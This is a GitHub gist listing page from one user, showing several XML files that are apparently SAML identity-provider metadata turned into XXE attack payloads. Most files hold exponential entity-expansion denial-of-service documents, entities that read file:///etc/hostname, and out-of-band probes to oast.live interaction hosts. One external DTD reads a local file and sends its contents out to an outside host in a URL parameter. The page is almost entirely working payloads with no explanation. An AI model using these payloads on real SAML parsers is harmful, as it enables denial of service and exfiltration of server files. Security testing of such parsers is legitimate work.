pablo itzinn
itzinn
/ dos_level4.xml
Created
April 16, 2026 12:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE foo [ | |
| <!ENTITY a "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"> | |
| <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"> | |
| <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;"> | |
| <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;"> | |
| ]> | |
| <md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="&d;"> | |
| <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"> | |
| <md:KeyDescriptor use="signing"> |
itzinn
/ dos_level3_big.xml
Created
April 16, 2026 12:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE foo [ | |
| <!ENTITY a "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"> | |
| <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"> | |
| <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;"> | |
| ]> | |
| <md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="&c;"> | |
| <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"> | |
| <md:KeyDescriptor use="signing"> | |
| <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> |
itzinn
/ dos_recursive.xml
Created
April 16, 2026 11:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE foo [ | |
| <!ENTITY a "AAAA"> | |
| <!ENTITY b "&a;&a;&a;"> | |
| <!ENTITY c "&b;&b;&b;"> | |
| ]> | |
| <md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="&c;"> | |
| <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"> | |
| <md:KeyDescriptor use="signing"> | |
| <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> |
itzinn
/ dos_baseline.xml
Created
April 16, 2026 11:41
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://dos-baseline.example.com"> | |
| <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"> | |
| <md:KeyDescriptor use="signing"> | |
| <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> | |
| <ds:X509Data> | |
| <ds:X509Certificate>MIICpDCCAYwCCQDU+pQ4pHgSnDANBgkqhkiG9w0BAQsFADAUMRIwEAYDVQQDDAkxMjcuMC4wLjEwHhcNMjMwMTAxMDAwMDAwWhcNMjQwMTAxMDAwMDAwWjAUMRIwEAYDVQQDDAkxMjcuMC4wLjEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC7o4qne60TB3pOYaBy/YjlhFNPFPaJMIxAfeOmMC9JsijCMHwBdJMGLL0IqkJYoMql0EvPbCkMOcaK8JCUjR8Qg7mMNMHeJggPHYjmNfSqFgHbQ0bKd1SxuKJH33TNnPEG0VlMLSJFNP3JX5JMlPzFjkHwIsXxD9AXMIFO0MJBBHaw4tHLxJm07JeTMK6bRhvrPBMFBOPCa+WNlRnJJMwT6++kRYjHWOxfrWuo4ql/v7kgpuIqzC5JDH8/M8wIGmKKNBINb+Jf8lMSV3Q2VwJk6ghIExjnlWy24cP+8qvfkEIz5JeBSTnmI+gNeGKtlIqV7RJJLCVLbXS39MIHfAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAGg6K0KFAcr9Do6TSg8dHA4y/lLJFz2EhM |
itzinn
/ file_general_entity.xml
Created
April 15, 2026 23:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE foo [ | |
| <!ENTITY xxe SYSTEM "file:///etc/hostname"> | |
| ]> | |
| <md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="&xxe;"> | |
| <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"> | |
| <md:KeyDescriptor use="signing"> | |
| <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> | |
| <ds:X509Data> | |
| <ds:X509Certificate>MIICpDCCAYwCCQDU+pQ4pHgSnDANBgkqhkiG9w0BAQsFADAUMRIwEAYDVQQDDAkxMjcuMC4wLjEwHhcNMjMwMTAxMDAwMDAwWhcNMjQwMTAxMDAwMDAwWjAUMRIwEAYDVQQDDAkxMjcuMC4wLjEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC7o4qne60TB3pOYaBy/YjlhFNPFPaJMIxAfeOmMC9JsijCMHwBdJMGLL0IqkJYoMql0EvPbCkMOcaK8JCUjR8Qg7mMNMHeJggPHYjmNfSqFgHbQ0bKd1SxuKJH33TNnPEG0VlMLSJFNP3JX5JMlPzFjkHwIsXxD9AXMIFO0MJBBHaw4tHLxJm07JeTMK6bRhvrPBMFBOPCa+WNlRnJJMwT6++kRYjHWOxfrWuo4ql/v7kgpuIqzC5JDH8/M8wIGmKKNBINb+Jf8lMSV3Q2VwJk6ghIExjnlWy24cP+8qvfkEIz5JeBSTnmI+gNeGKtlIqV7RJJLCVLbXS39MIHfAgMBAAEwDQYJKoZIhvcNAQELBQAD |
itzinn
/ simple_dtd_probe.xml
Created
April 15, 2026 22:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE foo [ | |
| <!ENTITY % probe SYSTEM "https://dtd-probe.d7g19m6tsgvhiorjbo7g7k6961t85hfh5.oast.live/probe.dtd"> | |
| %probe; | |
| ]> | |
| <md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://dtd-probe.example.com"> | |
| <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"> | |
| <md:KeyDescriptor use="signing"> | |
| <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> | |
| <ds:X509Data> |
itzinn
/ verify_entity.xml
Created
April 15, 2026 22:49
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE foo [ | |
| <!ENTITY xxe SYSTEM "https://verify-entity.d7g19m6tsgvhiorjbo7g7k6961t85hfh5.oast.live/entity-test"> | |
| ]> | |
| <md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="&xxe;"> | |
| <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"> | |
| <md:KeyDescriptor use="signing"> | |
| <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> | |
| <ds:X509Data> | |
| <ds:X509Certificate>MIICpDCCAYwCCQDU+pQ4pHgSnDANBgkqhkiG9w0BAQsFADAUMRIwEAYDVQQDDAkxMjcuMC4wLjEwHhcNMjMwMTAxMDAwMDAwWhcNMjQwMTAxMDAwMDAwWjAUMRIwEAYDVQQDDAkxMjcuMC4wLjEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC7o4qne60TB3pOYaBy/YjlhFNPFPaJMIxAfeOmMC9JsijCMHwBdJMGLL0IqkJYoMql0EvPbCkMOcaK8JCUjR8Qg7mMNMHeJggPHYjmNfSqFgHbQ0bKd1SxuKJH33TNnPEG0VlMLSJFNP3JX5JMlPzFjkHwIsXxD9AXMIFO0MJBBHaw4tHLxJm07JeTMK6bRhvrPBMFBOPCa+WNlRnJJMwT6++kRYjHWOxfrWuo4ql/v7kgpuIqzC5JDH8/M8wIGmKKNBINb+Jf8lMSV3Q2VwJk6ghIExjnlWy24cP+8qvfkEIz5JeBSTnm |
itzinn
/ fileread_outer.xml
Created
April 15, 2026 22:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE foo [ | |
| <!ENTITY % ext SYSTEM "https://gist.githubusercontent.com/itzinn/5ed3d989f5f67ff50d7a104bd705f447/raw/fileread_ext.dtd"> | |
| %ext; | |
| ]> | |
| <md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://fileread-test.example.com"> | |
| <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"> | |
| <md:KeyDescriptor use="signing"> | |
| <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> | |
| <ds:X509Data> |
itzinn
/ fileread_ext.dtd
Created
April 15, 2026 22:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % payload SYSTEM "file:///etc/hostname"> | |
| <!ENTITY % wrap "<!ENTITY % send SYSTEM 'https://fileread.d7g19m6tsgvhiorjbo7g7k6961t85hfh5.oast.live/?d=%payload;'>"> | |
| %wrap; | |
| %send; |
itzinn
/ xxe_safe_location.xml
Created
April 15, 2026 22:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE foo [ | |
| <!ENTITY marker "MARKERVALIDATED42"> | |
| ]> | |
| <md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://safe-loc.example.com"> | |
| <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol"> | |
| <md:KeyDescriptor use="signing"> | |
| <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> | |
| <ds:X509Data> | |
| <ds:X509Certificate>MIICpDCCAYwCCQDU+pQ4pHgSnDANBgkqhkiG9w0BAQsFADAUMRIwEAYDVQQDDAkxMjcuMC4wLjEwHhcNMjMwMTAxMDAwMDAwWhcNMjQwMTAxMDAwMDAwWjAUMRIwEAYDVQQDDAkxMjcuMC4wLjEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC7o4qne60TB3pOYaBy/YjlhFNPFPaJMIxAfeOmMC9JsijCMHwBdJMGLL0IqkJYoMql0EvPbCkMOcaK8JCUjR8Qg7mMNMHeJggPHYjmNfSqFgHbQ0bKd1SxuKJH33TNnPEG0VlMLSJFNP3JX5JMlPzFjkHwIsXxD9AXMIFO0MJBBHaw4tHLxJm07JeTMK6bRhvrPBMFBOPCa+WNlRnJJMwT6++kRYjHWOxfrWuo4ql/v7kgpuIqzC5JDH8/M8wIGmKKNBINb+Jf8lMSV3Q2VwJk6ghIExjnlWy24cP+8qvfkEIz5JeBSTnmI+gNeGKtlIqV7RJJLCVLbXS39MIHfAgMBAAEwDQYJ |
NewerOlder